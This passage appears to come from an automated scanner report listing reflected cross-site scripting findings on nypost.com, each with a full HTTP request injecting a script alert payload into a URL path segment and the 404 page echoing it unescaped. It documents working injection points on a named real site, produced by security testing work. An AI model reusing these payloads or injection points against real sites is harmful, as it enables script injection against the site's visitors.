HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal6264a<script>alert(1)</script>696e2bc1cc2/nypost/blocks/_news/local/events/events.css</p>
...[SNIP]...

1.367. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f366<script>alert(1)</script>df71b8c9f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost8f366<script>alert(1)</script>df71b8c9f2a/blocks/_news/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost8f366<script>alert(1)</script>df71b8c9f2a/blocks/_news/local/events/events.css</p>
...[SNIP]...

1.368. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c8c1d<script>alert(1)</script>32d06bf5a69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc8c1d<script>alert(1)</script>32d06bf5a69/_news/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc8c1d<script>alert(1)</script>32d06bf5a69/_news/local/events/events.css</p>
...[SNIP]...

1.369. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload eb69d<script>alert(1)</script>9e0774e7151 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_newseb69d<script>alert(1)</script>9e0774e7151/local/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:03 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_newseb69d<script>alert(1)</script>9e0774e7151/local/events/events.css</p>
...[SNIP]...

1.370. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 190e2<script>alert(1)</script>89ab85f2b38 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local190e2<script>alert(1)</script>89ab85f2b38/events/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local190e2<script>alert(1)</script>89ab85f2b38/events/events.css</p>
...[SNIP]...

1.371. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 60175<script>alert(1)</script>00356b5c361 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events60175<script>alert(1)</script>00356b5c361/events.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/events60175<script>alert(1)</script>00356b5c361/events.css</p>
...[SNIP]...

1.372. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 63628<script>alert(1)</script>3c754827f88 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css63628<script>alert(1)</script>3c754827f88 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css63628<script>alert(1)</script>3c754827f88</p>
...[SNIP]...

1.373. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3177<script>alert(1)</script>4d8b9214769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfiga3177<script>alert(1)</script>4d8b9214769/WebPortal/nypost/blocks/_news/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfiga3177<script>alert(1)</script>4d8b9214769/WebPortal/nypost/blocks/_news/local/events/events_home.css</p>
...[SNIP]...

1.374. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7540<script>alert(1)</script>7aa64d2af5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortald7540<script>alert(1)</script>7aa64d2af5f/nypost/blocks/_news/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortald7540<script>alert(1)</script>7aa64d2af5f/nypost/blocks/_news/local/events/events_home.css</p>
...[SNIP]...

1.375. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6203c<script>alert(1)</script>338a0b0e394 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost6203c<script>alert(1)</script>338a0b0e394/blocks/_news/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost6203c<script>alert(1)</script>338a0b0e394/blocks/_news/local/events/events_home.css</p>
...[SNIP]...

1.376. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 425ff<script>alert(1)</script>e4de40d6eda was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks425ff<script>alert(1)</script>e4de40d6eda/_news/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks425ff<script>alert(1)</script>e4de40d6eda/_news/local/events/events_home.css</p>
...[SNIP]...

1.377. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5c27b<script>alert(1)</script>12645fa9bdf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news5c27b<script>alert(1)</script>12645fa9bdf/local/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news5c27b<script>alert(1)</script>12645fa9bdf/local/events/events_home.css</p>
...[SNIP]...

1.378. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fe9b2<script>alert(1)</script>5a8659b8a1f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/localfe9b2<script>alert(1)</script>5a8659b8a1f/events/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/localfe9b2<script>alert(1)</script>5a8659b8a1f/events/events_home.css</p>
...[SNIP]...

1.379. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload eea73<script>alert(1)</script>e2ffc83a0ff was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/eventseea73<script>alert(1)</script>e2ffc83a0ff/events_home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/eventseea73<script>alert(1)</script>e2ffc83a0ff/events_home.css</p>
...[SNIP]...

1.380. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 16289<script>alert(1)</script>9173392b23a was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css16289<script>alert(1)</script>9173392b23a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css16289<script>alert(1)</script>9173392b23a</p>
...[SNIP]...

1.381. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ff6d<script>alert(1)</script>a394ae762 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig8ff6d<script>alert(1)</script>a394ae762/WebPortal/nypost/blocks/_news/local/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:32:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig8ff6d<script>alert(1)</script>a394ae762/WebPortal/nypost/blocks/_news/local/events/local_events.js</p>
...[SNIP]...

1.382. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7e9ef<script>alert(1)</script>32942061662 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal7e9ef<script>alert(1)</script>32942061662/nypost/blocks/_news/local/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal7e9ef<script>alert(1)</script>32942061662/nypost/blocks/_news/local/events/local_events.js</p>
...[SNIP]...

1.383. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d164<script>alert(1)</script>96fb840ef3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost9d164<script>alert(1)</script>96fb840ef3b/blocks/_news/local/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost9d164<script>alert(1)</script>96fb840ef3b/blocks/_news/local/events/local_events.js</p>
...[SNIP]...

1.384. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/_news/local/events/local_events.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 43523<script>alert(1)</script>917bd814d80 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks43523<script>alert(1)</script>917bd814d80/_news/local/events/local_events.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
